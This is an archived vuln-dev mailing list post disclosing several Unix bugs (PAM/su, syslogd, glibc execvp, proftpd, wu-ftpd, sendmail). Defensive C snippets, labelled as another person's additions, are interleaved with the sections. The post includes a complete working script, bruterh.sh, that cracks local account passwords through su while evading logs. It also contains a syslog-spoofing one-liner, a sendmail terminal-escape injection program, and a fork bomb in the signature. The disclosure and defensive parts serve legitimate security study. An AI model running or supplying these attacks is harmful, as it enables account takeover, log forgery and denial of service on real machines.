
List:       vuln-dev
Subject:    bruterh.sh & syslogd & [g]libc & proftpd & wu-ftpd & sendmail
From:       Michal Zalewski <lcamtuf () AGS ! PL>
Date:       2000-01-23 12:47:39

This post describes / demonstrates bugs in:

- Linux-PAM implementation (password cracking)
- syslogd daemon (spoofing)
- glibc execvp() function (undesirable behaviour)
- proftpd (SEGV)
- wu-ftpd (passing arbitrary parameters to three external programs)
- Sendmail (junk characters in queue)

No reason to panic.

===================
1. PAM/su on RedHat
===================

Known? Dunno. But works.

RedHat - NothingInLogs[tm] BruteForce(R) Password Crack
-------------------------------------------------------
  - (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> -

[+] Configured against user 'testy', wordfile: words
[+] Kill-delay set to 300000 usecs...
[+] Destination account is alive and well...
[+] /bin/su seems to be executable and setuid, hopefully it works...
[+] Let's go straight to number one...
[+] Wordfile 'words' loaded - 4 passwords...
[+] Estimated time: 0 secs, max: 1 secs.
[?] Trying 'testy' (3/4)...
[*] Huh, it worked. I've tried password 'testy' for 'testy'.
[+] Time wasted: 0 seconds.
[+] Thank You, and hope you enjoyed your stay.

=====================
2. syslogd / syslog()
=====================

Unix syslogd gets 'raw' log entries from the world-writable (o+w) /dev/log
socket, while the date, priority and so on are added by the user-end library
function, syslog(). Very, very clever. Get a command-line socket connectivity
tool at http://lcamtuf.hack.pl/pliki/uc.c, then try:

bash$ echo -ne 'XXX YY AA:BB:CC kernel - hax0red\0' | uc /dev/log
(ctrl+c)

Well-known? Hope so; anyway, it's time to think about getpeeruid() or to
change the permissions on the syslog socket.
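An added example (mine, not from the post): a check over raw /dev/log messages that flags the kind of entry the uc one-liner above injects. It mirrors what sysklogd does with the sender-supplied fields (timestamp recognised by punctuation at fixed offsets, LOG_USER assumed when <PRI> is missing); check_raw_message() and the flag names are invented, and on Linux the sender's uid would come from SO_PASSCRED/SCM_CREDENTIALS rather than a getpeeruid() call.

```c
/* Sanity checks on one raw message read from /dev/log: the <PRI>, timestamp
 * and program tag all come from whoever wrote to the socket, so none is trusted. */
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
enum { NO_PRI = 1, BAD_TIME = 2, FAKE_KERNEL = 4 };
/* sysklogd recognises a timestamp purely by punctuation at fixed offsets,
 * which "XXX YY AA:BB:CC " satisfies just as well as "Jan 23 12:47:39 ". */
static int timestamp_shaped(const char *m)
{
    return strlen(m) >= 16 && m[3] == ' ' && m[6] == ' ' &&
           m[9] == ':' && m[12] == ':' && m[15] == ' ';
}
/* Two-digit field whose first digit may be a space ("Jan  3"); -1 if not numeric. */
static int num2(const char *s)
{
    int d0 = s[0] == ' ' ? 0 : isdigit((unsigned char)s[0]) ? s[0] - '0' : -1;
    return (d0 < 0 || !isdigit((unsigned char)s[1])) ? -1 : d0 * 10 + s[1] - '0';
}
/* Value check on a field that already has the shape: month name, day, time ranges. */
static int timestamp_valid(const char *m)
{
    static const char months[] = "JanFebMarAprMayJunJulAugSepOctNovDec";
    int i, day = num2(m + 4), hh = num2(m + 7), mm = num2(m + 10), ss = num2(m + 13);
    for (i = 0; i < 12 && strncmp(m, months + 3 * i, 3) != 0; i++) {}
    return i < 12 && day >= 1 && day <= 31 && hh >= 0 && hh <= 23 &&
           mm >= 0 && mm <= 59 && ss >= 0 && ss <= 60;
}
/* Returns a bitmask of the problems found in msg (0 = nothing suspicious). */
int check_raw_message(const char *msg)
{
    int flags = 0, facility = 1;        /* LOG_USER is assumed when <PRI> is absent */
    const char *p = msg; char *end;
    if (*p == '<') {
        long pri = strtol(p + 1, &end, 10);
        if (end > p + 1 && *end == '>' && pri >= 0 && pri <= 191)
            facility = (int)(pri >> 3), p = end + 1;
    }
    if (p == msg) flags |= NO_PRI;
    if (timestamp_shaped(p)) {          /* syslogd keeps a sender-supplied date verbatim */
        if (!timestamp_valid(p)) flags |= BAD_TIME;
        p += 16;
    }
    /* klogd logs kernel messages with facility 0, so a "kernel" tag on any other facility
     * is forged. A raw writer can claim facility 0 too: credentials or permissions are the fix. */
    if (strncmp(p, "kernel", 6) == 0 && facility != 0) flags |= FAKE_KERNEL;
    return flags;
}
```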

=======================
3. glibc - execvp() bug
=======================

glibc 2.0.x execvp() (dunno about other versions?) is buggy: first it tries
execve() on the given program in the directories specified in PATH, but then,
if it gets ENOEXEC (executable format error), it treats the file just like a
shell script, calling /bin/sh -c filename. This might result in
strange/undesirable behaviour:

$ cat >'-c' <<EOF
anything
EOF
$ chmod 755 -- -c
$ cat >nic.c <<EOF
#include <unistd.h>
/* execlp() searches PATH for "-c"; the empty PATH entry set below makes that
 * the file in the current directory, and ENOEXEC then sends it to /bin/sh */
int main(void) {
  execlp("-c", "call_me_jane", "id", (char *)0);
  return 1;
}
EOF
$ gcc nic.c
$ PATH=$PATH::
$ ./a.out
uid=500(lcamtuf) gid=500(lcamtuf) groups=500(lcamtuf),2(daemon),80(network)

=====================
4. proftpd / mod_ls.c
=====================

Due to a missing * in modules/mod_ls.c around line 760, a pointer to another
pointer is incremented instead of the pointer it references. Result: SEGV.
It seems not to be exploitable, as this pointer to pointer is passed as the
first parameter of the _parse_options function, the second parameter of this
function is hard-coded to 0x80, and all we have is a read fault when
isblank(*0x80) is called.

Aaah, example? Quote 'LIST  X' (note: it is 'LIST(space)(space)X') while
talking to the ftpd daemon on the remote side.
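The bug class in one screenful, as an added example (not proftpd's code; the function names are made up): the fixed form advances the pointer the caller handed in, the buggy form advances its local copy, so the caller's cursor never moves and the read lands on whatever follows it, which in mod_ls is the isblank(*0x80) fault described above.

```c
/* The mod_ls bug pattern: a function receives a pointer to the caller's cursor
 * so it can advance it, but one missing '*' advances the local copy instead. */
#include <ctype.h>

/* Intended: skip blanks and leave *opt at the first non-blank character,
 * which is returned. */
int skip_blanks_fixed(const char **opt)
{
    while (isblank((unsigned char)**opt))
        (*opt)++;                       /* advance the referenced pointer */
    return **opt;
}

/* Buggy: opt++ steps to the next element of whatever opt points into, and the
 * caller's cursor never moves. In mod_ls the caller passes the address of a
 * single pointer, so the step lands on unrelated memory and faults. */
int skip_blanks_buggy(const char **opt)
{
    while (isblank((unsigned char)**opt))
        opt++;                          /* advances the local copy, not *opt */
    return **opt;
}

/* Returns the stop character of the fixed version, or -1 if the caller's
 * cursor was not really advanced to it. */
int demo_fixed(void)
{
    const char *cur = "  X";            /* what "LIST  X" leaves after the command */
    int c = skip_blanks_fixed(&cur);
    return *cur == c ? c : -1;
}

/* Same input through the buggy version; a second element follows the cursor so
 * the stray step stays well-defined here. Returns the character it stopped at. */
int demo_buggy(void)
{
    const char *args[] = { "  X", "next" };
    int c = skip_blanks_buggy(args);
    return args[0][0] == ' ' ? c : -1;  /* the caller's pointer never moved */
}
```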

=======================
5. wu-ftpd popen() bugs
=======================

[lcamtuf@www lcamtuf]$ ftp localhost
Connected to localhost.
220 www.XXXXX.pl FTP server (lcamtuf) ready.
Name (localhost:lcamtuf): lcamtuf
331 Password required for lcamtuf.
Password:
230 User lcamtuf logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put "smyk" "--help"
local: smyk remote: --help
200 PORT command successful.
150 Opening BINARY mode data connection for --help.
226 Transfer complete.
321 bytes sent in 0.000243 secs (1.3e+03 Kbytes/sec)
ftp> quote site checksum "--help"
200 Usage: /bin/md5sum [OPTION] [FILE]...
ftp> ls "--version"
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
ls (GNU fileutils) 3.16
226 Transfer complete.

..unfortunately, neither /bin/md5sum, /bin/cksum nor /bin/ls has any
interesting options (like 'use external program X' or 'dump output to
file X'), and I can't see any overflows/bugs in them.

Btw. 'quote site checksum existing_file' on RedHat machines causes the ftpd
daemon to hang, because there's no md5sum/cksum in /bin (they are in
/usr/bin instead).
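An added example covering both this section and section 3 (my code, not wu-ftpd's or glibc's): how a daemon should hand a user-supplied file name to an external tool. The lookup refuses relative or empty PATH entries, the child uses execve() so ENOEXEC never turns into /bin/sh, and a name starting with '-' gets a "./" prefix so md5sum or ls cannot read it as an option; the search path /usr/bin:/bin (which also covers the RedHat layout mentioned above) and the function names are assumptions.

```c
/* Hardened way to run an external tool on a user-supplied file name, for the
 * execvp() and wu-ftpd issues above. Search path and tool names are assumed. */
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
/* Locate tool in a colon-separated search path. Every entry must be absolute
 * (an empty one, as in PATH=$PATH::, means the cwd); refuse rather than skip.
 * Returns 0 and fills out with the first executable match, else -1. */
int resolve_tool(const char *tool, const char *path, char *out, size_t outlen)
{
    if (tool[0] == '\0' || tool[0] == '-' || strchr(tool, '/'))
        return -1;                                /* plain command names only */
    while (path) {
        const char *sep = strchr(path, ':');
        size_t len = sep ? (size_t)(sep - path) : strlen(path);
        if (len == 0 || path[0] != '/')
            return -1;
        if (snprintf(out, outlen, "%.*s/%s", (int)len, path, tool) < (int)outlen &&
            access(out, X_OK) == 0)
            return 0;
        path = sep ? sep + 1 : NULL;
    }
    return -1;
}
/* Make a user-supplied file name safe as a positional argument: a leading '-'
 * gets a "./" prefix ("--help" becomes "./--help"); empty names and embedded
 * newlines are rejected. Returns 0 or -1. */
int safe_file_arg(const char *name, char *out, size_t outlen)
{
    if (name[0] == '\0' || strchr(name, '\n'))
        return -1;
    int n = snprintf(out, outlen, "%s%s", name[0] == '-' ? "./" : "", name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}
/* Run tool on file via execve(): no PATH search and no /bin/sh fallback in the
 * child, so an ENOEXEC is just a failed exec. Returns the exit status or -1. */
int run_tool(const char *tool, const char *file)
{
    char exe[256], arg[256]; int status;
    if (resolve_tool(tool, "/usr/bin:/bin", exe, sizeof exe) || safe_file_arg(file, arg, sizeof arg))
        return -1;
    char *const argv[] = { exe, arg, NULL }, *const envp[] = { NULL };
    pid_t pid = fork();
    if (pid == 0) { execve(exe, argv, envp); _exit(127); }
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```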

=============================================
6. Sendmail and non-ASCII characters in queue
=============================================

Simply, try it:

-- queue_boo.c --
#include <stdio.h>
#include <unistd.h>

/* Hands sendmail a recipient whose name carries terminal escape sequences;
 * DeliveryMode=d defers the message so it sits in the queue for mailq to show. */
int main(void) {
  printf("Type '.', then 'mailq' (works with TERM=linux).\n");
  execl("/usr/sbin/sendmail",
        "sendmail",
        "-O",
        "DeliveryMode=d",
        "lp(\033[2J\033[0H\033[1m* 0WNED BOX *\033[0;30m)",
        (char *)0);
  return 1;
}
-- EOF --

Stupid.
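The defensive counterpart, as an added example that is not sendmail's code: whatever prints queue entries (mailq here) should show control bytes instead of handing them to the terminal. escape_for_terminal() is a made-up name; it turns the recipient above into lp(\e[2J\e[0H... rather than a cleared screen.

```c
/* Render untrusted text (a queue entry, a log line) so that control bytes are
 * shown instead of interpreted by the terminal. */
#include <stdio.h>
#include <string.h>

/* Copies s into out (capacity outlen) with ESC shown as "\e" and every other
 * control or 8-bit byte as "\xNN": the 0x80-0x9f range holds C1 controls such
 * as 0x9b (8-bit CSI), so UTF-8 rendering is deliberately sacrificed here.
 * Returns the number of bytes neutralised, or -1 if out is too small. */
int escape_for_terminal(const char *s, char *out, size_t outlen)
{
    size_t used = 0;
    int hits = 0;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        char rep[5] = { (char)c, 0 };           /* default: the byte itself */
        if (c == 0x1b)
            strcpy(rep, "\\e");
        else if (c < 0x20 || c >= 0x7f)
            snprintf(rep, sizeof rep, "\\x%02x", c);
        size_t n = strlen(rep);
        if (used + n >= outlen)
            return -1;
        memcpy(out + used, rep, n);
        used += n;
        hits += n > 1;                          /* counted only when rewritten */
    }
    out[used] = '\0';
    return hits;
}
```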

_______________________________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <> [AGS WAN] * [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 603 110 160]
To iterate is human, to recurse divine [P. Deutsch]

["bruterh.sh" (APPLICATION/X-SH)]

#!/bin/bash

# (c) 1999/2000 <lcamtuf@ids.pl>
# ------------------------------
#
# Requirements:
#
# - working /bin/su
# - recent PAM implementation (tested with RedHat 5.x)
# - 'usleep' command and bash 1.14.x or 2.0.x
#

DESTACC='testy'   # Account to crack
WORDFILE='words'  # Wordfile with passwords to test

KILLDELAY=03      # Delay (in 1/10 sec) to wait for su (<10)

# End of setup.

clear
echo "RedHat - NothingInLogs[tm] BruteForce(R) Password Crack"
echo "-------------------------------------------------------"
echo "  - (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> -  "
echo 

if [ ! "$1" = "" ]; then
  DESTACC="$1"
fi

KD=$[KILLDELAY*100000]

echo "[+] Configured against user '$DESTACC', wordfile: $WORDFILE"
echo "[+] Kill-delay set to $KD usecs..."


id "$DESTACC" &>/dev/null

if [ ! "$?" = "0" ]; then
  echo "[-] Hmm, user '$DESTACC' not found, paranoia?"
  echo
  exit 0
fi

SHL="`grep "^$DESTACC:" /etc/passwd|awk -F: '{print $7}'`"

if [ ! "$SHL" = "/bin/bash" ]; then
  echo "[-] Hmm, user '$DESTACC' has $SHL set as shell, expect problems..."
fi

echo "[+] Destination account is alive and well..."

if [ ! -f "$WORDFILE" ]; then
  echo "[-] Wordfile '$WORDFILE' not found, check it."
  echo
  exit 0
fi

if [ ! -u /bin/su ]; then
  echo "[-] Can't find +s on /bin/su, hack me."
  echo
  exit 0
fi

if [ ! -x /bin/su ]; then
  echo "[-] Haven't +x on /bin/su, hack me."
  echo
  exit 0
fi

echo "[+] /bin/su seems to be executable and setuid, hopefully it works..."

if [ ! -x /bin/usleep ]; then
  echo "[-] No /bin/usleep in this system. Be a hacker."
  echo
  exit 0
fi

if [ "$UID" = "0" ]; then
  echo "[-] Root?! You idiot..."
  echo
  exit 0
fi

echo "[+] Let's go straight to number one..."

LNS="`cat $WORDFILE | wc -l|awk '{print $1}'`"
CNT=0

echo "[+] Wordfile '$WORDFILE' loaded - $LNS passwords..."
echo "[+] Estimated time: $[LNS*KILLDELAY/25] secs, max: $[LNS*KILLDELAY/10] secs."

while [ "$CNT" -lt "$LNS" ]; do
  CNT=$[CNT+1]
  PASS="`head -$CNT $WORDFILE|tail -1`"
  echo -ne "[?] Trying '$PASS' ($CNT/$LNS)...                \r"
  echo "$PASS" | su "$DESTACC" &>/dev/null &
  usleep $KD
  kill -9 $! &>/dev/null
  if [ ! "$?" = "0" ]; then
    echo
    echo "[*] Huh, it worked. I've tried password '$PASS' for '$DESTACC'."
    echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
    echo "[+] Thank You, and hope you enjoyed your stay."
    echo
    exit 0
  fi
done

echo "[*] Hmm, end of wordfile, but no matching passwords :("
echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
echo "[+] Bad day, try again tomorrow?"
echo
exit 0

